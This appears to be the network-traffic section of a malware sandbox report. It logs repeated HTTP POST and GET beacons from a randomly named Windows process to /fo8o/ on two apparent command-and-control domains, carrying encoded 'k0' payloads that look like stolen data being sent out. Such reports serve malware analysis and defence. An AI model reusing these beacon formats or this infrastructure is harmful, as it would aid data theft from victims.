                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 66 6f 38 6f 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /fo8o/ was not found on this server.</p></body></html>


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                  18 | 192.168.2.5 | 49993 | 195.110.124.133 | 80 | 4568 | C:\Program Files (x86)\zXXMdJrjVnvIvHZcsndNGlxPnOtIsqJdmcnavVHSAEZhdrHrlu\oYzsgiLOOTqCTABCCGZlOCaAgG.exe
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  Dec 7, 2024 07:03:18.067347050 CET | 818 | OUT | POST /fo8o/ HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                  Accept-Language: en-US,en
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Host: www.elettrosistemista.zip
                                                                                  Origin: http://www.elettrosistemista.zip
                                                                                  Cache-Control: no-cache
                                                                                  Connection: close
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Content-Length: 223
                                                                                  Referer: http://www.elettrosistemista.zip/fo8o/
                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                                  Data Raw: 6b 30 3d 57 4d 64 30 43 59 78 6c 4c 48 31 6a 75 47 47 51 6d 48 6e 65 68 77 6d 5a 56 51 49 75 53 53 6b 43 36 6a 39 58 2b 64 71 4d 43 73 75 50 66 6c 35 72 65 71 41 4a 46 36 75 58 58 47 75 38 6e 64 4a 71 34 34 2f 51 7a 2f 38 61 39 39 33 48 42 46 31 47 46 72 51 30 50 48 46 6a 58 59 4f 47 69 57 37 30 69 66 45 7a 4e 2b 62 52 59 64 78 79 47 41 7a 37 6b 6e 44 7a 76 44 61 6a 73 6a 66 47 58 54 45 35 50 77 4b 4e 6c 42 7a 39 36 53 45 6f 66 72 6d 54 30 79 67 6c 2f 73 42 71 66 55 71 35 64 77 4d 30 36 52 41 4c 34 75 6b 49 49 4d 65 5a 33 77 34 32 47 2b 51 36 51 78 6e 47 74 61 45 30 49 50 6d 62 36 70 4c 36 46 4a 51 39 6c 62 6e 74 6f 38 6a 36 61 62 54 45 79 6f 71 74 6e 42 52 77
                                                                                  Data Ascii: k0=WMd0CYxlLH1juGGQmHnehwmZVQIuSSkC6j9X+dqMCsuPfl5reqAJF6uXXGu8ndJq44/Qz/8a993HBF1GFrQ0PHFjXYOGiW70ifEzN+bRYdxyGAz7knDzvDajsjfGXTE5PwKNlBz96SEofrmT0ygl/sBqfUq5dwM06RAL4ukIIMeZ3w42G+Q6QxnGtaE0IPmb6pL6FJQ9lbnto8j6abTEyoqtnBRw
                                                                                  Dec 7, 2024 07:03:19.260643005 CET | 367 | IN | HTTP/1.1 404 Not Found
                                                                                  Date: Sat, 07 Dec 2024 06:03:19 GMT
                                                                                  Server: Apache
                                                                                  Content-Length: 203
                                                                                  Connection: close
                                                                                  Content-Type: text/html; charset=iso-8859-1
                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 66 6f 38 6f 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /fo8o/ was not found on this server.</p></body></html>


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                  19 | 192.168.2.5 | 49994 | 195.110.124.133 | 80 | 4568 | C:\Program Files (x86)\zXXMdJrjVnvIvHZcsndNGlxPnOtIsqJdmcnavVHSAEZhdrHrlu\oYzsgiLOOTqCTABCCGZlOCaAgG.exe
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  Dec 7, 2024 07:03:20.789870024 CET | 1835 | OUT | POST /fo8o/ HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                  Accept-Language: en-US,en
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Host: www.elettrosistemista.zip
                                                                                  Origin: http://www.elettrosistemista.zip
                                                                                  Cache-Control: no-cache
                                                                                  Connection: close
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Content-Length: 1239
                                                                                  Referer: http://www.elettrosistemista.zip/fo8o/
                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                                  Data Raw: 6b 30 3d 57 4d 64 30 43 59 78 6c 4c 48 31 6a 75 47 47 51 6d 48 6e 65 68 77 6d 5a 56 51 49 75 53 53 6b 43 36 6a 39 58 2b 64 71 4d 43 76 4f 50 63 58 78 72 64 4a 6f 4a 45 36 75 58 65 6d 75 68 6e 64 49 32 34 34 6e 4d 7a 2f 77 4b 39 2b 66 48 42 6d 74 47 44 65 6b 30 59 58 46 6a 59 34 4f 4c 2f 6d 37 62 69 66 55 33 4e 2b 72 52 59 64 78 79 47 43 37 37 6a 32 44 7a 70 44 61 67 72 6a 66 4b 46 6a 46 65 50 77 69 33 6c 42 32 47 35 69 6b 6f 66 4c 32 54 32 48 38 6c 6a 38 42 6f 63 55 72 36 64 77 41 6e 36 52 4d 48 34 71 73 6d 49 4d 32 5a 30 33 46 74 57 4e 51 6d 4a 43 66 2f 72 36 30 52 65 49 71 72 39 59 76 57 4b 61 34 34 35 6f 6a 44 76 49 4c 39 54 6f 4b 68 7a 2b 48 2b 32 33 5a 35 5a 30 51 37 30 74 4e 47 45 30 61 73 4e 45 43 76 6f 50 68 41 71 41 5a 71 35 46 73 4f 52 6c 72 65 5a 61 4b 48 65 6f 2b 45 41 7a 2b 42 2f 77 36 52 30 4e 43 35 38 4b 33 65 51 48 39 45 4f 32 53 7a 58 78 48 55 52 70 76 65 43 75 66 49 7a 70 43 78 67 70 7a 77 38 69 31 6d 6b 52 56 59 69 74 6d 32 67 6f 5a 2b 2f 69 78 6a 34 37 72 76 6a 66 45 46 70 75 76 [TRUNCATED]
                                                                                  Data Ascii: k0=WMd0CYxlLH1juGGQmHnehwmZVQIuSSkC6j9X+dqMCvOPcXxrdJoJE6uXemuhndI244nMz/wK9+fHBmtGDek0YXFjY4OL/m7bifU3N+rRYdxyGC77j2DzpDagrjfKFjFePwi3lB2G5ikofL2T2H8lj8BocUr6dwAn6RMH4qsmIM2Z03FtWNQmJCf/r60ReIqr9YvWKa445ojDvIL9ToKhz+H+23Z5Z0Q70tNGE0asNECvoPhAqAZq5FsORlreZaKHeo+EAz+B/w6R0NC58K3eQH9EO2SzXxHURpveCufIzpCxgpzw8i1mkRVYitm2goZ+/ixj47rvjfEFpuvNwsVGrC9Ifw2YrdCRtt6C8W3LYNMRo5bYRsp5nM/eqiKZoxDflpLJCB1lRodrNt9wL04Nd7adMKOJWb586q0++bqb0hnKbeHTSSOaeXEfwuVRmO72bsYEpgRn4m0ARNwjYtA65YOS7JXA8qQ4K9J+v++n+MLZPtINn7STocl2A3Ct0TVuxuY+wgnsJMFRG6tA1RxuVLLvV1AnZhNx1HNnssc7WE/yLrcWMbUzBHXPc1kNCaBFFnx1U97uOS5kDZbbXMP2pDR6ux3gwd0AagBpgRl442rnmHx75cXU3eHxJswxungZDTNQUv505kKZxzw80dtlHOLk/pB/gRWWcZyZbk4ZdNQgs0BmrEzW8TVxt2k82jaSmoGnYjN9XoLQoV1V3MLEI+nuki6gSo2cPk1fxAh9p0o2ralwtZD0t//uTMCXDbrg8fVhD0Ly282XddZXUlAbrcOnA4Vo3SKxFUIZP/22/L8OhkvlybwgHCNEEkxzqhuyeOjkETJOhlPkmzcj/nIXmJCv/eM4YwZqaqLiZRh9WHtxfMi1fKrPdWm4edZPAx0FNzhKyMjvpHto3OeOWNpYDhPl3lVs0qQ1YNP/3AFuKWVkfqkP8N6s1Tl+CTchdpVnnfFygV02iAEx8s/ZD01jKVKesA0Wv8lObFdlA1utCJQSEcpsq [TRUNCATED]
                                                                                  Dec 7, 2024 07:03:22.163995028 CET | 367 | IN | HTTP/1.1 404 Not Found
                                                                                  Date: Sat, 07 Dec 2024 06:03:21 GMT
                                                                                  Server: Apache
                                                                                  Content-Length: 203
                                                                                  Connection: close
                                                                                  Content-Type: text/html; charset=iso-8859-1
                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 66 6f 38 6f 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /fo8o/ was not found on this server.</p></body></html>


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                  20 | 192.168.2.5 | 49995 | 195.110.124.133 | 80 | 4568 | C:\Program Files (x86)\zXXMdJrjVnvIvHZcsndNGlxPnOtIsqJdmcnavVHSAEZhdrHrlu\oYzsgiLOOTqCTABCCGZlOCaAgG.exe
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  Dec 7, 2024 07:03:23.461193085 CET | 527 | OUT | GET /fo8o/?k0=bO1UBvtoHFNUmlWGmXL3o3L5Dhw+Vy81qF418M7UHpKKa2cgLZsmM/SsbGGojtls67Xc6OgTo57aJm1+bsxMNglie/alwGrbjt4sQOb9JZJseQvAkmnJhBfN0CPURydTcQ==&hh=cJ5D4t7Hz6GD3fB HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                  Accept-Language: en-US,en
                                                                                  Host: www.elettrosistemista.zip
                                                                                  Connection: close
                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                                  Dec 7, 2024 07:03:24.769037962 CET | 367 | IN | HTTP/1.1 404 Not Found
                                                                                  Date: Sat, 07 Dec 2024 06:03:24 GMT
                                                                                  Server: Apache
                                                                                  Content-Length: 203
                                                                                  Connection: close
                                                                                  Content-Type: text/html; charset=iso-8859-1
                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 66 6f 38 6f 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /fo8o/ was not found on this server.</p></body></html>


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                  21 | 192.168.2.5 | 49996 | 217.196.55.202 | 80 | 4568 | C:\Program Files (x86)\zXXMdJrjVnvIvHZcsndNGlxPnOtIsqJdmcnavVHSAEZhdrHrlu\oYzsgiLOOTqCTABCCGZlOCaAgG.exe
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  Dec 7, 2024 07:03:47.178399086 CET | 786 | OUT | POST /fo8o/ HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                  Accept-Language: en-US,en
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Host: www.empowermedeco.com
                                                                                  Origin: http://www.empowermedeco.com
                                                                                  Cache-Control: no-cache
                                                                                  Connection: close
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Content-Length: 203
                                                                                  Referer: http://www.empowermedeco.com/fo8o/
                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                                  Data Raw: 6b 30 3d 72 7a 50 78 39 57 50 50 4e 34 6f 48 54 54 36 34 44 63 33 64 49 31 77 6c 57 4b 32 63 54 4b 55 30 61 2b 74 45 47 77 74 65 42 6d 32 75 48 6f 39 6e 51 51 56 70 4e 50 36 74 62 7a 2f 57 33 51 46 47 4a 69 33 77 63 37 67 2b 65 59 61 32 39 43 78 2f 50 68 6c 4c 47 46 56 54 31 71 66 55 4f 71 51 56 54 70 7a 4c 5a 43 6e 2b 59 30 58 6a 48 4b 70 2b 35 7a 6b 6a 49 38 69 75 50 6c 51 58 33 73 58 51 47 6d 6c 45 74 75 2f 4e 69 7a 70 55 4e 49 47 67 64 50 6f 33 51 52 76 55 6f 4f 6a 2b 68 6f 30 4a 75 4d 30 71 68 75 2f 53 71 4b 4c 44 43 47 38 4e 50 79 48 34 57 42 74 34 68 7a 43 79 55 71 71 52 6a 37 71 63 30 57 30 3d
                                                                                  Data Ascii: k0=rzPx9WPPN4oHTT64Dc3dI1wlWK2cTKU0a+tEGwteBm2uHo9nQQVpNP6tbz/W3QFGJi3wc7g+eYa29Cx/PhlLGFVT1qfUOqQVTpzLZCn+Y0XjHKp+5zkjI8iuPlQX3sXQGmlEtu/NizpUNIGgdPo3QRvUoOj+ho0JuM0qhu/SqKLDCG8NPyH4WBt4hzCyUqqRj7qc0W0=
                                                                                  Dec 7, 2024 07:03:48.373049021 CET | 1085 | IN | HTTP/1.1 301 Moved Permanently
                                                                                  Connection: close
                                                                                  content-type: text/html
                                                                                  content-length: 795
                                                                                  date: Sat, 07 Dec 2024 06:03:48 GMT
                                                                                  server: LiteSpeed
                                                                                  location: https://www.empowermedeco.com/fo8o/
                                                                                  platform: hostinger
                                                                                  panel: hpanel
                                                                                  content-security-policy: upgrade-insecure-requests
                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c [TRUNCATED]
                                                                                  Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                  22 | 192.168.2.5 | 49997 | 217.196.55.202 | 80 | 4568 | C:\Program Files (x86)\zXXMdJrjVnvIvHZcsndNGlxPnOtIsqJdmcnavVHSAEZhdrHrlu\oYzsgiLOOTqCTABCCGZlOCaAgG.exe
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  Dec 7, 2024 07:03:49.835768938 CET | 806 | OUT | POST /fo8o/ HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                  Accept-Language: en-US,en
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Host: www.empowermedeco.com
                                                                                  Origin: http://www.empowermedeco.com
                                                                                  Cache-Control: no-cache
                                                                                  Connection: close
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Content-Length: 223
                                                                                  Referer: http://www.empowermedeco.com/fo8o/
                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                                  Data Raw: 6b 30 3d 72 7a 50 78 39 57 50 50 4e 34 6f 48 54 79 4b 34 47 37 72 64 4f 56 77 6d 61 71 32 63 61 71 55 77 61 2b 68 45 47 78 5a 33 42 77 65 75 48 4b 6c 6e 52 52 56 70 44 76 36 74 54 54 2f 54 71 67 46 4a 4a 69 37 34 63 36 4d 2b 65 5a 36 32 39 44 68 2f 50 53 39 4b 48 56 56 56 2b 4b 66 53 41 4b 51 56 54 70 7a 4c 5a 42 61 70 59 30 76 6a 45 36 5a 2b 35 53 6b 67 46 63 69 74 48 46 51 58 39 4d 57 5a 47 6d 6b 52 74 73 62 33 69 77 42 55 4e 4a 57 67 54 36 63 30 4c 68 76 4f 6c 75 69 68 74 4a 52 2b 6a 50 34 65 6c 4e 69 46 35 5a 72 6b 44 77 52 6e 56 51 50 51 46 68 42 41 78 67 4b 46 46 61 4c 34 35 59 36 73 71 42 6a 43 35 30 6a 4c 41 61 59 62 59 48 4c 72 6a 6c 56 48 6b 36 30 65
                                                                                  Data Ascii: k0=rzPx9WPPN4oHTyK4G7rdOVwmaq2caqUwa+hEGxZ3BweuHKlnRRVpDv6tTT/TqgFJJi74c6M+eZ629Dh/PS9KHVVV+KfSAKQVTpzLZBapY0vjE6Z+5SkgFcitHFQX9MWZGmkRtsb3iwBUNJWgT6c0LhvOluihtJR+jP4elNiF5ZrkDwRnVQPQFhBAxgKFFaL45Y6sqBjC50jLAaYbYHLrjlVHk60e
                                                                                  Dec 7, 2024 07:03:51.029675961 CET | 1085 | IN | HTTP/1.1 301 Moved Permanently
                                                                                  Connection: close
                                                                                  content-type: text/html
                                                                                  content-length: 795
                                                                                  date: Sat, 07 Dec 2024 06:03:50 GMT
                                                                                  server: LiteSpeed
                                                                                  location: https://www.empowermedeco.com/fo8o/
                                                                                  platform: hostinger
                                                                                  panel: hpanel
                                                                                  content-security-policy: upgrade-insecure-requests
                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c [TRUNCATED]
                                                                                  Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                  23 | 192.168.2.5 | 49998 | 217.196.55.202 | 80 | 4568 | C:\Program Files (x86)\zXXMdJrjVnvIvHZcsndNGlxPnOtIsqJdmcnavVHSAEZhdrHrlu\oYzsgiLOOTqCTABCCGZlOCaAgG.exe
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  Dec 7, 2024 07:03:52.489723921 CET | 1823 | OUT | POST /fo8o/ HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                  Accept-Language: en-US,en
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Host: www.empowermedeco.com
                                                                                  Origin: http://www.empowermedeco.com
                                                                                  Cache-Control: no-cache
                                                                                  Connection: close
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Content-Length: 1239
                                                                                  Referer: http://www.empowermedeco.com/fo8o/
                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
Data Ascii: k0= [TRUNCATED]
Dec 7, 2024 07:03:53.681307077 CET | 1085 | IN | HTTP/1.1 301 Moved Permanently
                                                                                  Connection: close
                                                                                  content-type: text/html
                                                                                  content-length: 795
                                                                                  date: Sat, 07 Dec 2024 06:03:53 GMT
                                                                                  server: LiteSpeed
                                                                                  location: https://www.empowermedeco.com/fo8o/
                                                                                  platform: hostinger
                                                                                  panel: hpanel
                                                                                  content-security-policy: upgrade-insecure-requests
                                                                                  Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>


Session ID: 24 | Source IP: 192.168.2.5 | Source Port: 49999 | Destination IP: 217.196.55.202 | Destination Port: 80 | PID: 4568 | Process: C:\Program Files (x86)\zXXMdJrjVnvIvHZcsndNGlxPnOtIsqJdmcnavVHSAEZhdrHrlu\oYzsgiLOOTqCTABCCGZlOCaAgG.exe
Timestamp | Bytes transferred | Direction | Data
Dec 7, 2024 07:03:55.187002897 CET | 523 | OUT | GET /fo8o/?k0=mxnR+iHPFb8HZiaBBOLBDF0OC7azb6MRPLEBGwFodGelSqoCQiBwPqu0WU7djgVoJgj4cKk6Pp6Q/yIaSghKZS1b6NbCHbQEZbfQfUSvJErRJZB76jwKK/37UG0r+NzcRQ==&hh=cJ5D4t7Hz6GD3fB HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                  Accept-Language: en-US,en
                                                                                  Host: www.empowermedeco.com
                                                                                  Connection: close
                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
Dec 7, 2024 07:03:56.384815931 CET | 1236 | IN | HTTP/1.1 301 Moved Permanently
                                                                                  Connection: close
                                                                                  content-type: text/html
                                                                                  content-length: 795
                                                                                  date: Sat, 07 Dec 2024 06:03:56 GMT
                                                                                  server: LiteSpeed
                                                                                  location: https://www.empowermedeco.com/fo8o/?k0=mxnR+iHPFb8HZiaBBOLBDF0OC7azb6MRPLEBGwFodGelSqoCQiBwPqu0WU7djgVoJgj4cKk6Pp6Q/yIaSghKZS1b6NbCHbQEZbfQfUSvJErRJZB76jwKK/37UG0r+NzcRQ==&hh=cJ5D4t7Hz6GD3fB
                                                                                  platform: hostinger
                                                                                  panel: hpanel
                                                                                  content-security-policy: upgrade-insecure-requests
